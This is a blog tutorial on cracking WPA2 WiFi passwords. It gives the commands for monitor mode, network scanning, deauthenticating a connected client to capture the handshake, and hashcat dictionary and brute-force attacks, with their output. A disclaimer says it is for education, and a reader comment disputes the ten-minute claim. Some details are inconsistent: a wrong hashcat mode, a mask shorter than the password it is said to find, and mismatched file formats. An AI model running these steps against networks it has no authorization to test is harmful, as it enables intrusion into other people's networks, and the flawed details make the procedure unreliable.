How to Hack WiFi Passwords in 10 minutes using Hashcat

 

How to Hack WiFi Passwords in 10 minutes using Hashcat


In today's digital era, the security of wireless networks is paramount. One of the tools that security professionals use to test the strength of a network is Hashcat. In this guide, we'll dive deep into how to employ Hashcat for cracking WiFi passwords within just 10 minutes. Hashcat isn't just a regular password cracker; it leverages the power of your GPU and offers versatile ways to attack hashed passwords. While brute-force and dictionary attacks are common methods, they rely heavily on using files packed with likely password combinations. Let's unravel the power of Hashcat and understand how it stands out in the world of ethical hacking.

Disclaimer for "How to Hack WiFi Passwords in 10 minutes using Hashcat":

This article is intended for educational purposes only. Tampering with WiFi networks and other unauthorized activities without prior explicit consent can be illegal in many countries. The author, publisher, and associated entities are not responsible for any misuse of the information provided in this article. Always seek permission from network owners prior to conducting any testing. It's essential to understand the implications and responsibilities of ethical hacking. Use this information responsibly and ethically.

Setting Up Monitor Mode

To begin with, we must transition our wireless card into monitor mode. This is achieved by executing the command below:

airmon-ng start wlan0

For the sake of clarity, I'll assume that the name of your wireless interface is 'wlan0'. However, ensure you replace it with the appropriate name if it's different. The command 'iwconfig' can assist in identifying the precise wireless interface name.

Also read : How I Ethically Hacked a WordPress Site in 10 Minutes Using WPScan

Identifying Your Target

Initiate a scan for nearby wireless routers employing the command:

airodump-ng wlan0

 

CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2022-05-20 11:10                                          
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                                 
 28:EF:01:34:64:92  -29       19        1    0   6  54e  WPA2 CCMP   PSK  Linksys                            
 28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  SkyNet
 28:EF:01:34:64:91  -29       19        1    0   1 54e   WPA2 CCMP   PSK  TP-LINK                         
 28:EF:01:35:39:87  -42       17        0    0   11 54e  WPA2 CCMP   PSK  Orange-Net                                                                                                                                                             
 
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                                                                                                                     

28:EF:01:35:34:85  28:EF:01:23:46:68  -57    0 - 1      0        1  

You'll be presented with a data table that provides details of all the WiFi routers within your vicinity.

From the given demo data, I'll opt to decipher the password for my own network, dubbed “SkyNet”. I'll need the MAC address (BSSID) and channel pertaining to this network. 

In a fresh terminal window, type:

airodump-ng --bssid 28:EF:01:35:34:85 -c 6 --write wpa-01 wlan0

 --write wpa-01 indicates the filename where data will be saved, and it's also where the 4-way handshake will be recorded.

How to Hack WiFi Passwords in 10 minutes using Hashcat


Utilizing the "ls" command, you can view this file. It's crucial as this file will later be converted into a distinct format to facilitate password cracking.

Capture a WPA/WPA2 Handshake

WPA and WPA2, by design, use a 4-way handshake to affirm device connections to the network. To capture this handshake, it's essential for the client to authenticate with the Access Point (AP). 

If a device is already authenticated, it can be de-authenticated. Upon doing so, the device will attempt to re-authenticate automatically. During this process, the 4-way handshake can be captured. Initiate another terminal and input:

aireplay-ng -0 100 -a 28:EF:01:35:34:85 -c 28:EF:01:23:46:68 wlan0

Here:

- `-0` implies deauthentication.

- `100` refers to the quantity of deauth packets.

- `-a 28:EF:01:35:34:85` is the MAC address of the access point.

- `-c 28:EF:01:23:46:68` is the client’s MAC address being deauthenticated.

CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  28:EF:01:35:34:85   39 100       51        0    0   6 54  WPA2 CCMP   PSK  SkyNet                      
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes 
  
  28:EF:01:35:34:85  28:EF:01:23:46:68  -57    0 - 1      0        1

 

From the presented information, particularly note “WPA handshake: 28:EF:01:35:34:85” situated in the top right. This signifies that the handshake has been successfully captured by `airodump-ng`.

Transitioning the .cap File to .hccap Format

Prior to attempting a password crack, the `.cap` file (specifically `wpa-01.cap`) must be converted to the specific hashcat format, `.hccapx`. An expedient method involves uploading the `.cap` file to Hashcat's online converter to transform it into `.hccapx` format.

How to Hack WiFi Passwords in 10 minutes using Hashcat

Cracking the WPA/WPA2 Handshake with Hashcat

Hashcat boasts a high degree of versatility, so let’s delve into two prevalent attack techniques:

1. Dictionary Attack: This type of attack leverages a predefined list or dictionary of potential passwords to attempt authentication. The success of the attack largely depends on the comprehensiveness of the dictionary used.

2. Brute-Force Attack: A more time-consuming approach, this involves trying all possible password combinations until the correct one is found. Its success is guaranteed but can be time-intensive depending on password complexity.

With the proper tools and techniques, it becomes feasible to decrypt a network's password, underscoring the importance of robust security measures. Always use such knowledge ethically and within legal bounds.

Also read: Top 10 Best Open Source Intelligence (OSINT) Tools for Penetration Testing You Should Know

Dictionary Attack Approach

To effectively employ hashcat for dictionary-based attacks, a wordlist - essentially a compilation of popular passwords within a large text file - is necessary. One of the renowned wordlists that many pen-testers opt for is `rockyou.txt`, a reservoir of commonly employed passwords. For users of Kali Linux, the `rockyou.txt` wordlist can typically be located under `/usr/share/wordlists`.

To initiate the cracking procedure, execute the following command:

hashcat -m 22000 wpa-01.hc22000 rockyou.txt

Here, hashcat is launched under the `22000` mode, designed specifically to target WPA security protocols. The file intended for cracking is denoted as “wpa-01.hc22000”, while “rockyou.txt” serves as the wordlist.

How to Hack WiFi Passwords in 10 minutes using Hashcat

The end result? The password is successfully deciphered to be “justletmein”.

Brute-Force Assault Strategy

Brute-Force, by design, exhaustively tests every conceivable combination, leading to an exponential increase in potential combinations in tandem with the length of the password. To commence a brute force attack, utilize:


hashcat -m 2200 -a 3 wpa-01.hc22000 ?l?l?l?l?l?l?l?l?l?l


Here, `-a 3` denotes the adoption of a brute force mode, while `wpa-01.hc22000` is the converted `.cap` file, and the sequence of `?l` indicates the presumption that the password is constituted of lowercase letters.

Hashcat permits utilization of these charsets:

- `?l` = abcdefghijklmnopqrstuvwxyz

- `?u` = ABCDEFGHIJKLMNOPQRSTUVWXYZ

- `?d` = 0123456789

- `?h` = 0123456789abcdef

- `?H` = 0123456789ABCDEF

- `?s` =  space and !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~


Given a password like 87654321, a custom mask such as `?d?d?d?d?d?d?d?d` could be employed.

How to Hack WiFi Passwords in 10 minutes using Hashcat

Conclusively, a mask leveraging lowercase letters (`?l`) was used in this demonstration to uncover the password, which was ascertained to be “justletmein”.

In Conclusion

This tutorial has furnished you with insights on deciphering WPA2 passwords through tools like Hashcat. It's imperative to emphasize that such endeavors should solely be conducted in environments where authorization is explicit.

Your feedback and queries are much valued. Feel free to share your thoughts in the comments.

Many thanks for your time and attention!

Post a Comment

1 Comments

  1. Not realistic... I have hash at with 3 Nvidia Tesla A100 and I get a hash rate of 4391.8mh/s.
    To compare, with ntlm I have a hash rate of 480.3 GH/s
    For brute force wpa2 psk is not realistic, if you find the password, you are lucky

    ReplyDelete